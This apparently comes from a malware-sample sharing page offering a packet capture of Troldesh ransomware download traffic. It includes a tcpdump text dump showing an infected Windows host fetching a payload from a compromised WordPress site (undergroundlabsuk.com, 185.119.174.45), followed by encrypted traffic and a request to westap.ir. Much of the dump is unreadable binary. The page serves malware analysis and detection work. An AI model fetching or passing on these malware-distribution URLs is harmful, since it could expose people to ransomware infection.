Text Example

TROLDESH Ransomware PCAP Download Traffic Sammple undergroundlabsuk.com 185.119.174.45

Download Attachments

  • 1 pcap 1cjpg
    Date added: May 30, 2019 6:51 am Added by: admin File size: 3 MB Downloads: 40

URLhaus Database

URLhaus tries to identify the malware associated with the payload served by a certain malware URL. In case URLhaus is able to identify the associated malware family, the payload will be tagged accordingly (field signature). The page below gives you an overview on payloads that URLhaus has identified as Ransomware.Troldesh.

2019-05-29 21:53:52.091291 IP 10.1.10.162.49184 > 185.119.174.45.80: Flags [P.], seq 1195198762:1195199227, ack 4032472939, win 16425, length 465: HTTP: GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
E…..@…{.
.
..w.-. .PG=I*.Z.kP.@)….GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: undergroundlabsuk.com
Connection: Keep-Alive

2019-05-29 21:53:55.597305 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
E …P@.1….w.-
.
..P. .Z.kG=J.P..{….HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.891821 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
E …Q@.1….w.-
.
..P. .Z.kG=J.P..{….HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.902075 IP 10.1.10.162.49185 > 185.119.174.45.443: Flags [P.], seq 3137670173:3137670307, ack 1653186217, win 16425, length 134
E…..@…}/
.
..w.-.!……b…P.@)…………}…5b…….;?.NE.Z..dp…!………./.5…
….. .
2019-05-29 21:54:12.260958 IP 10.1.10.162.49192 > 185.119.174.45.443: Flags [P.], seq 2305352218:2305352384, ack 1046836851, win 16425, length 166
E…..@…|.
.
..w.-.(…h..>evsP.@)……………5r..”9..a……..v…M.L…+.m .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.261557 IP 10.1.10.162.49191 > 185.119.174.45.443: Flags [P.], seq 3481323599:3481323765, ack 128666795, win 16425, length 166 E…..@…|. . ..w.-.’…..O..L.P.@).z…………..5r|W^..Xh..vt.3B..?…..]&.p.. .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.263148 IP 10.1.10.162.49194 > 185.119.174.45.443: Flags [P.], seq 1173719525:1173719691, ack 3012160489, win 16425, length 166 E…..@…|. . ..w.-…E…….P.@). …………..5r..7.0…i….xF.d…5……. .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.271973 IP 10.1.10.162.49193 > 185.119.174.45.443: Flags [P.], seq 1172014663:1172014829, ack 773836195, win 16425, length 166 E…..@…|. . ..w.-.)..E..G….P.@)…………….5r.=….Cc.5Rqw..j…”…R|.C. .l.Z&5…?.g5…[..p.@..2..9.q?…./.5… ….. . .2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.313725 IP 185.119.174.45.443 > 10.1.10.162.49185: Flags [P.], seq 37350:38810, ack 769, win 140, length 1460 E ….@.1….w.- . ….!b.0…..P…./..a^?…”….Y..p…:.’.a.s.K.Q .|..u….u..m.6..1g.gC(ZL.!S.1.j. ……?.O.z..\y.5..p…H/…&8….k.Q..Y..6…v…..r…L.x.P:g..J.w(Wn…….&.#”.f…….r......{f....&...5...).....n....,2..g.c..c..v….wH#…. Lv.K.i…f….n<..Q….<%.k……k...]..).*.gQ.D.5z....xZ..o{.....-mc...........].0o......S.|..".P...z...B.<FmL.....1.~C...8..pW......H.W........ax..[+ ...H..L69..l%h#….P..A”..+..2/.MBp[r.S……s..:R.y..grRs.b……R..)t..2..D.S..&/.y.l.5…/.”B..Y.&H\b….qC.6.…k.v..[…]..c….1……>…0.J.-.>u.. .dk……….j……..;y..%..?……….,b..z Z}s.;.j..I<..|4…+…..R.{h”.4Y…S,pOO.”…1….,..KF.N.3>,..D;),…Rm.8.G…h.-.S-^.5…K.ht… …v..n…A….t..7….’?…%…?
…….k.<..9..9..D.m..U.I(.. E….
&…lGS..oV..eJ.G.o..Vj.P …M..RiNn...d6.X.o.z..e;………M.dT.v….a…3g…r4&Hh.f…………\H.s.a.”<…s.'{$…Gj.d…(.7..&……e3.1…..E}”5I|..T.$2[..O.x..K…E.~………. ..F….P………..-…9F{…./../..”….N..’…+…. |5.r…WYZ…..l.d..}.).KZ…Z………f.J.F4….{.X.d…~.M..f=;…M….…v…ju….Lz…zA..x-.x./..P.2;~……E].h.O.t8..v....=.......FhR......l.y...…y.U……..z….)u….P..K..nZ!….O…………|..rlJ……m…..’…..’.1…..^oI<..i..N.X…q3g..7.:..-d~H}q…}.vP..G..:M.. …..K0q..2. ……..2s+..g%.0…o.M..$…..U]…..=…,j.z..’…{..
2019-05-29 21:54:12.357676 IP 185.119.174.45.443 > 10.1.10.162.49194: Flags [P.], seq 1:146, ack 166, win 123, length 145
E ….@.1.I..w.-
.
….….E…P..{.......Q...M...B.. s..#.......o...]......./wt> .l.Z&5...?.g5...[..p.@..2..9.q?.....................0.;z........B.H........mZ.7...Z..UT.+.B......q..s 2019-05-29 21:54:12.358112 IP 10.1.10.162.49194 > 185.119.174.45.443: Flags [P.], seq 166:225, ack 146, win 16388, length 59 E..c..@...}J . ..w.-.*..E......zP.@...............0.6g.$..p.QV'=.|&...Z.b…..xU4}v…… ^O..(.). 2019-05-29 21:54:12.361324 IP 185.119.174.45.443 > 10.1.10.162.49192: Flags [P.], seq 1:146, ack 166, win 123, length 145 E ….@.1..:.w.- . . ..w.-./……@(U.P.@.l^…………..t.Z.A.%…… .E… ]m…… …i…K.L…A…K..!…….S…..f..-1..=….]..7 …5…&….>R<|Op….B].k.X…rC.D..DC.2..)n.Kh..f.$e..R.j.1..?'<.*...!...I.~.....N..Ks,n… Qz.….>..’].%d8..!.p..G.1..m.@@….yE.~B.2 c.'......80{.l.....xW.C...>....>.y.Gg,.0B..G3.."{i..i:.<...<u....w....6w.C...F.S.#_..1P..W..1.....J"R.M..3....."Kv^l.T..k.…….R..qD..^<.A.^………p.1Y…q..K….j.;P….6.
.f……..v……../..P.T2..s….V.s.3.PBv.:…e.l….
2019-05-29 21:54:12.892573 IP 10.1.10.162.49203 > 185.119.174.45.443: Flags [P.], seq 3572732553:3572732719, ack 4054164407, win 16425, length 166
E….O@…|.
.
..w.-.3……….P.@)g……………5s..y…8….,j.g..5…l-.F>.Q .l.Z&5…?.g5…[..p.@..2..9.q?…./.5…
….. .
.2.8…….<…………..undergroundlabsuk.com………. ………….. 2019-05-29 21:54:12.954592 IP 10.1.10.162.49204 > 185.119.174.45.443: Flags [P.], seq 3200671630:3200671796, ack 2230721411, win 16425, length 166
…skipping…
Expires: Thu, 30 May 2019 13:55:28 GMT
Date: Thu, 30 May 2019 01:55:34 GMT
Connection: keep-alive

0…
……0…. +…..0……0…0…L0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X3..20190529221100Z0u0s0K0 ..+……..~.j.r….. dl..-q.]...Jjc.}....9..Ee.........r.U"..PW.H.&..>.....20190529220000Z....20190605220000Z0.. *.H.............~.z.L...8!.(....#.,q..{…8.”..K.1@.0.xx…t..&… .In.i..D8.1..
.g..A7x..S……..8.G}.. ...i.q.f.....E9. 9.N...s.....jd.cS.f@..qcP!..3.......hy.?UZN. oV...-.}:b...B..,Q....W.....P....>v..=-M}..n#......x....,,.i....... .......w....v..:&…….^.?……
2019-05-29 21:55:35.085480 IP 204.237.142.208.80 > 10.1.10.162.49293: Flags [P.], seq 1:914, ack 255, win 237, length 913: HTTP: HTTP/1.1 200 OK
E ….@.6…….
.
..P..Bwp…..P…….HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: “C911F69DFEADAC3CC6E8285B7E18A61BF26D22F5E74E9A35FE21376765EAA26A”
Last-Modified: Wed, 29 May 2019 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43194
Expires: Thu, 30 May 2019 13:55:28 GMT
Date: Thu, 30 May 2019 01:55:34 GMT
Connection: keep-alive

0…
……0…. +…..0……0…0…L0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X3..20190529221100Z0u0s0K0 ..+……..~.j.r….. dl..-q.]...Jjc.}....9..Ee.........r.U"..PW.H.&..>.....20190529220000Z....20190605220000Z0.. *.H.............~.z.L...8!.(....#.,q..{…8.”..K.1@.0.xx…t..&… .In.i..D8.1..
.g..A7x..S……..8.G}.. ...i.q.f.....E9. 9.N...s.....jd.cS.f@..qcP!..3.......hy.?UZN. oV...-.}:b...B..,Q....W.....P....>v..=-M}..n#......x....,,.i....... .......w....v..:&…….^.?……
2019-05-29 21:55:52.309807 IP 10.1.10.162.49294 > 185.55.224.150.80: Flags [P.], seq 763839603:763839890, ack 2187406094, win 16425, length 287: HTTP: GET /favicon.ico HTTP/1.1
E..G..@…?K
.
..7…..P-.Ds.a+.P.@). ..GET /favicon.ico HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: westap.ir
Connection: Keep-Alive

Leave a Reply